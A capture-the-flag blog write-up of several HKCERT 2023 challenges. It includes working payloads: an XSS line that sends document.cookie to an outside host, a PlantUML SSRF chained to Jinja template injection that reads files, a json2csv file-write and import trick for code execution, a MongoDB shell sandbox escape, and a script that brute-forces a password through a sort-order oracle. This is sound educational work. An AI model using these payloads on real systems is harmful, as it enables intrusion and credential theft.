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HKCERT 2023 CTF Writeup

Posted on:15 November 2023

I participated in the HKCERT 2023 CTF from November 10th to 12th. Our team (O0089 - EzAntiPwn) of 3 placed #8 in the open division, and #15 out of all teams (including international teams). our team result

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Re:Zero - #web

150 points, 210 solves

  1. Complete Achievement 0 - 20
  2. No Revives, No Kill, Dealt 0 damage in game

Once completed, refresh the browser and the flag will be printed on the console.


Note: There is a guide for this challenge here.

We're given a blog post in the challenge description that kind of gives the entire challenge away: screenshot of the blog post

Checking the storage tab in firefox shows us that there is indeed data in localStorage: firefox devtools storage showing data object

Now we can just run some code in the console to edit the data.achievements.unlocked array:

let d = JSON.parse(;
d.achievements.unlocked = [
  0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20,
]; = JSON.stringify(d);
JSON.parse(; // check it worked

firefox console showing code above being run

And now if we reload the page...

firefox console showing flag Flag: hkcert23{m0dm0d__loc4l__stor4g3}

screenshot of discord showing first blood 5 minutes after ctf started Got a first blood within 5 minutes as well!

ST Code (I) - #misc

50 points, 198 solves

Flag 1: Can you read the flag from ST Code?
Note: There is a guide for this challenge here.


Code used in this solution (and for ST Code II) can be found on GitHub.

The guide gives us a big hint: guide blog post We can see in the svg file that the QR code is made up of a lot of rect elements that have rx attributes: screenshot of the flag svg file Using this information, let's write a Typescript file stcode.ts to parse STCode.

import { XMLParser } from "fast-xml-parser";

const xmlOptions = {
    ignoreAttributes: false,
    unpairedTags: ["rect"],
    ignoreDeclaration: true,
const parser = new XMLParser(xmlOptions);

interface SVGXml {
    svg: {
        rect: {
            "@_rx"?: string;

export function decodeST(svg: string | Buffer): string {
    const xml: SVGXml = parser.parse(svg);

    let bits: boolean[] = [];
    for (const rect of xml.svg.rect) {
        if ("@_rx" in rect) {
            bits.push(rect["@_rx"] === "1");
    return bitsToAscii(bits);

export function bitsToAscii(bits: boolean[]): string {
    return bits
        .reduce((acc, cur) => acc + (cur ? "1" : "0"), "")
        .reduce((acc, cur) => acc + String.fromCharCode(parseInt(cur, 2)), "");

Now we can make a script flag1.ts to decode the ST from the file:

import { decodeST } from "./stcode.ts";
import { readFileSync } from "fs";

const flag1 = decodeST(readFileSync("./flag1.svg"));

And running the script with bun gets us the flag:

$ bun run flag1.ts

ST Code (II) - #misc

350 points, 32 solves

Flag 2: Can you generate ST Code to read the flag?


Code used in this solution (and for ST Code I) can be found on GitHub.

Navigating to /flag2 presents us with the challenge: image We can see that we get a session id cookie and a timer. Let's check /source for the source code (full source here).'/flag2', upload.single('svg'), async (req, res) => {
  var svg = null;
    if(req.file && req.file.fieldname == 'svg'){
      svg = fs.readFileSync(req.file.path);
  res.setHeader('content-type', 'text/plain');
    var left = (60-(;
    if(left < 0){
      res.send(`Time's up...`);
      if(req.session.done == 0){
          var qr = await decodeQR(svg);
          if(qr == flag1){
            req.session.done += 1;
            res.send(`Complete 15 more times to get flag.\nQRCode:\n`+req.session.qrcode+`\nSTCode:\n`+req.session.stcode+`\nYour have `+left+` seconds left.`);
            res.send('Wrong flag1');
          var qr = await decodeQR(svg);
          if(qr != req.session.qrcode){
            res.send('Wrong QR');
            var st = decodeST(svg);
            if(st != req.session.stcode){
              res.send('Wrong ST');
              req.session.done += 1;
              if(req.session.done > 15){
                res.send(`Congratulations! You have completed this stage!\n`+flag2);
                req.session.qrcode = random_string(16-req.session.done);
                req.session.stcode = random_string(req.session.done);
                res.send(`Complete `+(16-req.session.done)+` more times to get flag.\nQRCode:\n`+req.session.qrcode+`\nSTCode:\n`+req.session.stcode+`\nYour have `+left+` seconds left.`);
    res.send(`Time's up...`);

It seems like we will need to produce 15 correct QR codes with ST codes embedded to get the flag. We can use the same XML library to reverse the operation and add rx attributes to the rects:

export function encodeST(svg: string | Buffer, secret: string): string {
    const xml: SVGXml = parser.parse(svg);
    const bits = asciiToBits(secret);
    console.log(xml.svg.rect.length, bits.length);

    for (let i = 0; i < bits.length; i++) {
        // skip first rect
        xml.svg.rect[i + 1]["@_rx"] = bits[i] ? "1" : "0";

    return `<?xml version="1.0" standalone="yes"?>
${<rect.+?)>/g, "$1/>")}`;

And then a script flag2.ts to interact with the challenge site:

import { readFile, writeFile } from "fs/promises";
import { encodeQR, encodeST } from "./stcode.ts";

const HOST = "";
const flag1 = await readFile("./flag1-qr.svg", "utf8");

const res = await fetch(`${HOST}/flag2`, { redirect: "manual" });
const cookie = res.headers.get("Set-Cookie")!.split(";")[0];
console.log("got cookie", cookie);

const uploadSvg = (svg: string): Promise<string> => {
    const data = new FormData();
        new File([svg], "getpwned.svg", { type: "image/svg+xml" }),
    return fetch(`${HOST}/flag2`, {
        method: "POST",
        headers: {
            Cookie: cookie,
        body: data,
    }).then((res) => res.text());

const regex = /QRCode:\n(.+)\nSTCode:\n(.+)\n/;
let svg = flag1;
while (true) {
    const output = await uploadSvg(svg);

    const match = output.match(regex);
    if (!match) {
        throw match;

    const [_, qr, st] = match;

    console.log(`qr: '${qr}'\nst: '${st}'`);
    svg = encodeST(encodeQR(qr), st);
    await writeFile("./flag2.debug.svg", svg);

However, running the script throws an error!

$ bun run flag2.ts
got cookie connect.sid=s%3AxsaE5rs6vwmFKg-X_cBASerpVn9vdv3H.Rp9hULLKRzUTyNNGetTKfKB0n2FAZ02CtHPv9Ri%2BrEQ
Complete 15 more times to get flag.
Your have 59.303 seconds left.
Complete 5 more times to get flag.
Your have 53.185 seconds left.
qr: 'cz3ehqmky449aublof7a'
st: 'k5sg23o54ngnt1jey3e9alumhlh53cerwu4chgcdmzzg'
327 352
42 |     const bits = asciiToBits(secret);
43 |     console.log(xml.svg.rect.length, bits.length);
44 |
45 |     for (let i = 0; i < bits.length; i++) {
46 |         // skip first rect
47 |         xml.svg.rect[i + 1]["@_rx"] = bits[i] ? "1" : "0";
TypeError: undefined is not an object (evaluating 'xml.svg.rect[i + 1]["@_rx"] = bits[i] ? "1" : "0"')
      at encodeST (/Users/user/projects/ctf/hkcert/2023/stcode/stcode.ts:47:8)
      at /Users/user/projects/ctf/hkcert/2023/stcode/flag2.ts:40:10

Looking at our debug output shows us the problem: bits.length, the length of the ST Code bit array, is greater than xml.svg.rect.length, the amount of rect elements in the QR code svg. This is because the QR codes that the challenge needs gets smaller and smaller while the ST codes get larger and larger. We can solve this problem by duplicating the rects in the svg for more rx space:

 export function encodeST(svg: string | Buffer, secret: string): string {
     const xml: SVGXml = parser.parse(svg);
+    //duplicate qr squares for more st space
+    xml.svg.rect.push(...xml.svg.rect.slice(1).map((obj) => ({ ...obj })));
+    //duplicate qr squares for more st space (again)
+    xml.svg.rect.push(...xml.svg.rect.slice(1).map((obj) => ({ ...obj })));
     const bits = asciiToBits(secret);

Now with plenty of space to fit the ST Code, we can run the script again to get the flag.

$ bun run flag2.ts
got cookie connect.sid=s%3AtKU06E4qhCoowoLxU-Ulu0I01QqX_ZDn.oBsZiLVwe%2BPXJ5jMecklXW4aHJomte9oBaMXPIAYY%2B0
Complete 1 more times to get flag.
Your have 53.189 seconds left.
qr: '8lmp'
st: 'qyzq9kt4wb6l4ndpztrw4huqdiohbaqpoczosty5l8imltgp6eot612t3o4m'
905 480
Congratulations! You have completed this stage!
error: null

Flag: hkcert23{ST_ST&s4_Speeeeeeed_&_Tricks--cksckscks}

Baby XSS again - #web

100 points, 132 solves

Someone complained that XSS challenges are hard. We hear your opinion.
You can inject any external javascript from as you like using the src parameter in the query string. Good luck!
Attachment: > Note: There is a guide for this challenge here. \

Once again, the guide tells us what to do: screenshot of blog post We just need to create a simple pastebin with a payload:

location = "" + document.cookie;

Now we use the download link as suggested by the blog post to submit our XSS: challenge page with xss link Submitting the URL gets us our flag in

screenshot of dashboard showing flag

Flag: hkcert23{pastebin_0r_trashbin}

json2csv - #pwn

350 points, 8 solves


Now we're getting into the harder challenges. Navigating to the webservice shows us a simple UI with an input field, and command line options field. challenge web service Naturally with any web service to CLI program challenge, let's first try a simple shell injection payload in the command line options. shell injection Executing this query only gets us the CSV of our input: image

Let's take a look at the source code to see what's going on behind the scenes.

FROM node:18-slim
WORKDIR /usr/src/app
RUN npm install express body-parser
RUN npm install -g @json2csv/cli
COPY server.js .
RUN chmod -R 555 /usr/src/app/*
RUN chmod 555 /

USER node
CMD ["node","server.js"]

The Dockerfile isn't anything special and installs the @json2csv/cli npm package and runs a server.js file.

const express = require('express');
const bodyParser = require('body-parser');
const {spawnSync} = require('child_process');
const PORT = 8080;
const HOST = '';

const app = express();
app.use(bodyParser.urlencoded({extended: false}));

app.get('/', (req, res) => {
});'/', (req, res) => {
  res.setHeader('content-type', 'text/plain');
    const args = req.body.cmd.split(' ');
    const csv = spawnSync('json2csv', args, {input: req.body.json});

app.listen(PORT, HOST, () => {
  console.log(`Running on http://${HOST}:${PORT}`);

The most interesting call is to child_process.spawnSync on line 22. The nodejs documentation tells us the following:

The child_process.spawnSync() method is generally identical to child_process.spawn() ...
If the shell option is enabled, do not pass unsanitized user input to this function. Any input containing shell metacharacters may be used to trigger arbitrary command execution.

Unfortunately for us, the shell option is false by default, meaning we'll need to find an attack vector through the json2csv command. Let's check the documentation on

Fast and highly configurable JSON to CSV converter. It fully support conversion following the RFC4180 specification as well as other similar text delimited formats as TSV.
@json2csv/cli makes json2csv usable as a command line tool.

We can also see from the command line options that we can write to arbritrary files (this will be useful later):

  -o, --output <output>    Path and name of the resulting csv file. Defaults to stdout.

Other than that, the documentation doesn't really give us much help. Let's take a look at src/json2csv.ts. Scrolling past the 90 lines of CLI options gets us to the getInputJSON function:

async function getInputJSON<TRaw>(inputPath: string): Promise<TRaw> {
  const assert =
    extname(inputPath).toLowerCase() === '.json'
      ? { assert: { type: 'json' } }
      : undefined;
  const { default: json } = await import(`file://${inputPath}`, assert);
  return json;

For those familiar with nodejs and ES modules in general, one thing should immediately jump out - the await import() call. The import() function, "commonly called dynamic import, is a function-like expression that allows loading an ECMAScript module asynchronously and dynamically into a potentially non-module environment." What this is saying is that import() loads a file as an ECMAScript module (or JS module) and runs the code inside, meaning we can execute arbitrary files as JS through the input file parameter.

With the -q parameter of json2csv, we can disable the quotes around the output csv:

## {"foo": "bar"}, default options

## {"foo": "bar"}, empty -q param

Combining this with the -o param we found earlier, we can now write to arbitrary files and run them as JS code. Let's use a simple payload: challenge page with payload

[{"a": "import {readFileSync} from 'fs';"}, {"a": "console.log(readFileSync('/'))"}]

-H -q -o /tmp/sportshead.mjs Note the two spaces between -q and -o - the web service splits our arguments by spaces, so we can effectively pass an empty string as the -q argument, disabling quotes.

But running -i /tmp/sportshead.mjs gets us an empty output - we did something wrong here. Let's try to test this locally:

node@cf00c551f557:/usr/src/app$ json2csv -i /tmp/sportshead.js
Error: Data should be a valid JSON object or array
    at tokenizer.onError (file:///usr/local/lib/node_modules/@json2csv/cli/node_modules/@json2csv/plainjs/dist/mjs/StreamParser.js:76:15)
    at Tokenizer.error (file:///usr/local/lib/node_modules/@json2csv/cli/node_modules/@streamparser/json/dist/mjs/tokenizer.js:566:14)
    at Tokenizer.write (file:///usr/local/lib/node_modules/@json2csv/cli/node_modules/@streamparser/json/dist/mjs/tokenizer.js:548:18)
    at JSON2CSVStreamParser.write (file:///usr/local/lib/node_modules/@json2csv/cli/node_modules/@json2csv/plainjs/dist/mjs/StreamParser.js:86:24)
    at JSON2CSVNodeTransform._transform (file:///usr/local/lib/node_modules/@json2csv/cli/node_modules/@json2csv/node/dist/mjs/Transform.js:28:31)
    at Transform._write (node:internal/streams/transform:175:8)
    at writeOrBuffer (node:internal/streams/writable:392:12)
    at _write (node:internal/streams/writable:333:10)
    at Writable.write (node:internal/streams/writable:337:10)
    at ReadStream.ondata (node:internal/streams/readable:777:22)

Wait, what? Streams? Why isn't our file being imported? Going back to the json2csv's main function tells us that processing in-memory using the getInputJSON function is only enabled when config.streaming is false (line 322). Adding the -s parameter lets us disable the streaming behaviour and import the file as JS.

  -s, --no-streaming    Process the whole JSON array in memory instead of doing it line by line.


<Buffer 23 21 2f 62 69 6e 2f 73 68 0a 65 63 68 6f 20 68 6b 63 65 72 74 32 33 7b 59 5f 6e 6f 74 5f 6a 75 24 74 75 73 65 5f 7a 61 2d 2d 4e 30 44 45 5f 70 61 63 ... 63 more bytes>

Whoops... we forgot to read the file as utf8, rookie mistake! Let's try again: json2csv-03

echo hkcert23{Y_not_ju$tuse_za--N0DE_package?!}
## you cannot even run this script properly, what a joke

With only 8 solves, I personally think this challenge should have been given a bit more credit and should have deserved 400 points.

MongoJail - #pwn

250 points, 49 solves

Can you escape from Shibuya?
nc 28225
Attachment: > Note: There is a guide for this challenge here.

First let's try connecting to the challenge server.

user@computer:~/projects/ctf/hkcert/2023/mongojail$ nc 28225
Enter math expression:

Seems like we're in some sort of REPL. Checking the blog post tells us we are in mongosh: image

The blog post also mentions:

All built-in variables and functions, and require, module, globalThis are also sealed became undefined

globalThis is blocked, but what if I do this globally?

user@computer:~/projects/ctf/hkcert/2023/mongojail$ nc 28225
Enter math expression:
  global: <ref *1> {
    global: [Circular *1],
    clearImmediate: [Function: clearImmediate],
    setImmediate: [Function: setImmediate] {
      [Symbol(nodejs.util.promisify.custom)]: [Getter]
    clearInterval: [Function: clearInterval],
    clearTimeout: [Function: clearTimeout],
    setInterval: [Function: setInterval],
    setTimeout: [Function: setTimeout] {
      [Symbol(nodejs.util.promisify.custom)]: [Getter]
    queueMicrotask: [Function: queueMicrotask],
    structuredClone: [Function: structuredClone],
    atob: [Getter/Setter],
    btoa: [Getter/Setter],
    performance: [Getter/Setter],
    fetch: [AsyncFunction: fetch],
    _: [Getter/Setter],
    '@@@mdb.signatures@@@': {
      Document: { type: 'Document', attributes: {} },
      CommandResult: {
        type: 'CommandResult',

My terminal almost exploded... guess that works! Let's see what we can do with this (pun intended):

user@computer:~/projects/ctf/hkcert/2023/mongojail$ nc 28225
Enter math expression:
  appendFile: [Function: appendFile],
  appendFileSync: [Function: appendFileSync],
  access: [Function: access],
  accessSync: [Function (anonymous)],
  chown: [Function: chown],
  chownSync: [Function: chownSync],
  chmod: [Function: chmod],
  chmodSync: [Function: chmodSync],
  close: [Function: close],
  closeSync: [Function: closeSync],
  copyFile: [Function: copyFile],
  copyFileSync: [Function: copyFileSync],
  cp: [Function: cp],
  cpSync: [Function: cpSync],
  createReadStream: [Function: createReadStream],
  createWriteStream: [Function: createWriteStream],
  exists: [Function: exists],

By some stroke of luck we have this.fs available to us.

$ nc 28225
Enter math expression:
user@computer:~/projects/ctf/hkcert/2023/mongojail$ nc 28225
Enter math expression:
<Buffer 23 21 2f 62 69 6e 2f 73 68 0a 65 63 68 6f 20 68 6b 63 65 72 74 32 33 7b 57 6f 6c 66 72 61 6d 41 6c 70 68 61 5f 4c 30 76 33 7a 5f 53 68 69 62 75 79 61 ... 20 more bytes>

Once again, I forgot to set the encoding:

user@computer:~/projects/ctf/hkcert/2023/mongojail$ nc 28225
Enter math expression:
this.fs.readFileSync('/', {encoding:"utf8"})
echo hkcert23{WolframAlpha_L0v3z_Shibuya-Yuri_Harajuku-Furi}

ProbablyUnknown's Markup Language - #web

350 points, 11 solves

We all know that CS majors must know a long list of markup languages like HTML, XML, etc... How about IS majors? UML? Is UML even a markup language?

Test your UML knowledge!


Navigating to the challenge site shows us an SPA "PlantUML Server": challenge page

The attached zip file's docker-compose.yml shows us two services, plantuml and puml.local:

version: '3'

    build: plantuml-server
      - 8001:8080
    restart: unless-stopped
    build: web
    restart: unless-stopped

plantuml-server/Dockerfile is only one line, and seems to be the SPA that we get from the challenge:

FROM plantuml/plantuml-server:jetty

On the other hand, web/Dockerfile is a bit more complicated, and we can see that the flag is it's usual spot of /

FROM python:alpine
RUN apk add tini
RUN pip install flask

RUN chmod 555 / /

ENTRYPOINT ["/sbin/tini", "--"]
CMD ["python",""] is a very simple Flask app with only a / route:

from flask import Flask, request, render_template_string

app = Flask(__name__)
def index():
	return render_template_string("""{%% raw %%}
<!doctype html>
    <title>PUML Demo</title>

    <meta charset="utf-8" />
    <meta http-equiv="Content-type" content="text/html; charset=utf-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1" />
    <style type="text/css">

    <h1>PUML Demo</h1>
    <p><a href="">More information...</a></p>
{%% endraw %%}""" % {"puml":request.args.get("puml")})

if __name__ == "__main__":"", port=80)

Something we can see from the source code is that render_template_string is being called on a Python format string - meaning that we can perform server-side template injection (SSTI). Unfortunately for us, the puml.local webservice is not exposed by docker-compose, meaning we will need to obtain server side request forgery (SSRF) from the PlantUML server.

Let's go back to the PlantUML server and see what we can do with it. Clearing the code editor gives us this result: PlantUML welcome image

Typing license in the editor renders the license information to the screen: PlantUML license

It seems like PlantUML does not only support diagrams, but also has keywords/commands like license. We can check the PlantUML docs for some more information.

PlantUML docs sidebar

Immediately when we open the documentation website we can see a link to "Preprocessing" in the sidebar. preprocessing page

Scrolling past the generic templating language variable declarations and control flow statements gets us to a section titled "Including files or URL [!include, !include_many, !include_once]": screenshot of "including files" section

In a table named "Builtin functions", we also find a %load_json function: load_json row

Let's try loading puml.local as JSON: json parse error from puml

As expected, the JSON parser gets an error when it encounters the HTML source, but we unfortunately don't get the HTML in our output.

We can use the !include directive instead to load the URL:

!include http://puml.local
Alice -> Bob : %load_json("http://puml.local")

puml error log with HTML source dumped

Our %load_json parser error managed to dump the HTML source! Now that we have SSRF using the !include directive and dumping the HTML using the JSON parser error, we can get to some template injection. Here's a simple payload we can test out:

// {% endraw %}{{1+1}}{% raw %}
!include http://puml.local/?puml=%7B%25%20endraw%20%25%7D%7B%7B1%2B1%7D%7D%7B%25%20raw%20%25%7D%0A
Alice -> Bob : %load_json("http://puml.local/")

puml output with injected payload Success! Now we need to find a payload to read from / Testing out different payloads I found online got me this payload (from swisskeyrepo/PayloadsAllTheThings, url encoding with cyberchef):

// {% endraw %}{{"/").read()}}{% raw %}
!include http://puml.local/?puml=%7B%25%20endraw%20%25%7D%7B%7Bget%5Fflashed%5Fmessages%2E%5F%5Fglobals%5F%5F%2E%5F%5Fbuiltins%5F%5F%2Eopen%28%22%2Fproof%2Esh%22%29%2Eread%28%29%7D%7D%7B%25%20raw%20%25%7D
Alice -> Bob : %load_json("http://puml.local/")

puml output with flag Flag: hkcert23{System_Analysis_&_Design_IS_SAD_0r_SAND?} (make sure to change the &amp; to &!)

Secret Notebook - #web

350 points, 24 solves

I wrote a notebook with some juicy secret! Didn't know what's inside then.



The challenge website presents us with a simple login/signup interface with username/password fields. challenge page

After logging in, we get a page with a text box, and three buttons to submit notes, retrieve secret notes, and retrieve public notes. Clicking retrieve public notes renders a table to the page of usernames and public notes: challenge page with table

Clicking retrieve secret notes does nothing - we will probably need to be logged in as Administrator. Taking a look at the source code, we can see all the SQL queries are using parameterised queries, and therefore not vulnerable to SQL injection - apart from the doGetPublicNotes function:

def doGetPublicNotes(column, ascending):
    connector = getConnector()
    cursor = connector.cursor()
    if column and not isInputValid(column):
    if ascending  != "ASC":
        ascending = "DESC"
    cursor.execute(f"SELECT username, publicnote FROM users ORDER BY {column} {ascending};")
    results = []
    for row in cursor.fetchall():
    return results

Unfortunately, ascending can either be ASC or DESC, and column is checked against isInputValid:

def isInputValid(untrustedInput: str) -> bool:
    if "'" in untrustedInput \
        or "\"" in untrustedInput \
        or ";"  in untrustedInput \
        or "/"  in untrustedInput \
        or "*"  in untrustedInput \
        or "-"  in untrustedInput \
        or "#"  in untrustedInput \
        or "select"  in untrustedInput.lower() \
        or "insert"  in untrustedInput.lower() \
        or "update"  in untrustedInput.lower() \
        or "delete"  in untrustedInput.lower() \
        or "where"  in untrustedInput.lower() \
        or "union"  in untrustedInput.lower() \
        or "sleep"  in untrustedInput.lower() \
        or "secretnote"  in untrustedInput.lower() :
        return False
    return True

The blacklist is pretty strict on what we can pass in, but we can still sort by arbitrary columns (except for secretnote).

  username VARCHAR(16) NOT NULL,
  password VARCHAR(32) NOT NULL,
  publicnote VARCHAR(64),
  secretnote VARCHAR(64),
  PRIMARY KEY (username)
def init():
    connector = getConnector()
    cursor = connector.cursor()
    digits = string.digits
    password = ''.join(secrets.choice(digits) for i in range(16))
    cursor.execute(f"INSERT INTO users (username, password, publicnote, secretnote) VALUES ('{'Administrator'}','{password}','{'Welcome! I am admin and I hope you are having fun.'}', '{os.environ['FLAG']}') ON DUPLICATE KEY UPDATE password = '{password}';")

We can see that the Administrator acccount is initialised with the flag, and a random 16 digit string is generated for the password. The signup route is not protected by any captcha, so we can easily bruteforce the Administrator password using binary search and sorting by columns.

const HOST = "";

const signup = (username: string, password: string) => fetch(`${HOST}/signup`, {
    body: JSON.stringify({username, password}),
    method: "POST",
    headers: {
        "Content-Type": "application/json"
}).then(res => res.ok);

interface UserData {
    username: string;
    publicnote: string;

const cookie = btoa(`root:s2rYMCv3g2Gk`); // apparently this is actually not meant as a user/pass for the chall
// its actually the sql DB info
const getPasswords = (): Promise<{
    content: UserData[]
}> => fetch(`${HOST}/note?noteType=public&column=password&ascending=ASC`, {
    headers: {
        "Cookie": `token=${cookie}`
}).then(res => res.json());

const PREFIX = "ez";
let iter = 0;
const newUsername = () => `${PREFIX}${iter++}`;

let min = 0;
let max = 10;
let correct = "";

while (true) {
    if (max - min < 2) {
        correct += min.toString();
        console.log("got correct digit:", min, "new:", correct);
        min = 0;
        max = 10;
        if (correct.length === 16) {
            throw "done";
    const guess = Math.floor((min + max) / 2);
    const guessStr = (correct + guess.toString()).padEnd(16, "0");

    const username = newUsername();
    await signup(username, guessStr);

    const {content: passwords} = await getPasswords();

    const adminIndex = passwords.findIndex(u => u.username === "Administrator");
    const guessIndex = passwords.findIndex(u => u.username === username);

    console.log(username, min, max, guessStr, adminIndex, guessIndex);

    if (adminIndex > guessIndex) { // admin is greater
        min = guess;
    } else if (adminIndex < guessIndex) { // admin is smaller
        max = guess;
    } else {
        // wtf???
        throw "admin == guess???";
user@computer:~/projects/ctf/hkcert/2023/notebook/pwn$ bun run pwn.ts
ez88 0 10 5000000000000000 82 237
ez89 0 5 2000000000000000 82 207
ez90 0 2 1000000000000000 82 177
got correct digit: 0 new: 0
got correct digit: 8 new: 033634733381008
ez142 0 10 0336347333810085 107 112
ez143 0 5 0336347333810082 107 109
ez144 0 2 0336347333810081 108 107
got correct digit: 1 new: 0336347333810081
error: done

All that work with the script, and turns out someone gave the password away with their attempt (only backwards), and my script was one digit off: secretnotebook-01 Password: 0336347333810082 Flag: hkcert23{17_15_n07_50_53cr37_4f73r_4ll}


All in all, the HKCERT23 CTF was quite fun and I think the challenges were written quite well. In the future I hope to be able to see some more complex web problems, and also maybe some more node.js problems.